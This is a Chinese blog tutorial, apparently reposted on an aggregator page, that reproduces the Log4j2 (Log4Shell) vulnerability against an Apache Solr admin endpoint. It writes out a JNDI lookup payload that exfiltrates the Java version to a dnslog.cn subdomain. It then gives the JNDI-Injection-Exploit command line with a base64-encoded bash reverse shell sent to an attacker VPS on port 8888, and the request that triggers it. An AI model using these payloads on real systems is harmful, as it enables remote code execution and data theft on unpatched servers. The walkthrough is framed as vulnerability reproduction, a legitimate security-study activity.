当前位置: 首页 > news >正文

Log4j2漏洞复现

目录

一、观察页面,尝试外带

二、反弹shell


一、观察页面,尝试外带

我们来看访问一下外部资源,看他会不会去访问.这里我们使用dnslog生成一个dns,尝试访问,并在后面拼接我们需要的信息,查看是否有记录。这里推荐一个dnslog的网站。

DNSLog PlatformDNSLog平台http://www.dnslog.cn/

接下来我们将其拼接一下,然后去访问。使用/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.peuuh8.dnslog.cn}就可以将其版本带出。接下来我们访问一下。

发现访问成功,我们去dnslog那里看一下有没有记录。

发现有记录,接下来我们让它去访问我们远程的木马,尝试反弹shell。

二、反弹shell

接下来我们尝试反弹shell,这里我们使用JNDI-Injection-Exploit这个工具来帮助我们。首先将反弹shell的命令进行base64编码。

这里反弹shell是将其反弹到我们服务器的8888端口。接下来我们使用JNDI-Injection-Exploit来帮助我们生成木马。我们使用java -jar target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,[经过base64编码后的命令]}|{base64,-d}|bash" -A [你的vpsip]来生成payload。接下来我们使用此密码来生成即可。

生成payload成功,接下来我们开启我们的8888端口进行监听。

接下来,我们让网站来访问我们的服务器,从而获取其shell。访问/solr/admin/cores?action=${jndi:你的payload}即可。

访问成功,接下来我们查看一下服务器那里有没有收到监听即可。

发现已经收到监听,且我们的用户名已经发生改变,我们尝试执行命令。

发现已经获取到shell,至此结束!

http://www.lryc.cn/news/597251.html

相关文章:

  • 论文解析 基于遗传算法增强YOLOv5算法的合成数据风力涡轮叶片缺陷检测
  • mysql什么时候用char,varchar,text,longtext
  • 什么是HTTP长连接、短连接?谁更能抗DoS攻击?
  • C# 正则表达式
  • C#使用socket报错 System.Net.Sockets.SocketException:“在其上下文中,该请求的地址无效。
  • 抽奖系统(2)——注册/登陆
  • C#面向对象三大特性的封装
  • C#定时任务实战指南:从基础Timer到Hangfire高级应用
  • 【系统全面】常用SQL语句大全
  • 避坑:C# json反序列化为float精度丢失
  • 棱镜技术在光谱相机中应用
  • 第八章 W55MH32 HTTP Client示例
  • 机器人行业工商注册企业基本信息数据(1958-2023年)
  • 9.0% 年增速驱动!全球自清洁滚轮拖布机器人市场2031年将迈向 946 百万美元
  • [spring6: @EnableWebSocket]-源码解析
  • [深度学习] 大模型学习3下-模型训练与微调
  • (Arxiv-2025)OmniGen2:通向先进多模态生成的探索
  • springboot集成LangChain4j
  • 华为仓颉编程语言实践体验
  • 开源 Arkts 鸿蒙应用 开发(十)通讯--Http数据传输
  • 高级IO简单介绍
  • 小架构step系列23:加载自定义配置
  • 基于 XGBoost 与 SHAP 的医疗自动化办公与可视化系统(上)
  • 快速梳理遗留项目
  • AI聊天方案:vue+nodeJs+SSE
  • Git 常用的提交类型
  • NX741NX777美光固态闪存NX783NX791
  • CentOS 7 Linux 基础知识点汇总
  • Day01_C++
  • 河南萌新联赛2025第二场-河南农业大学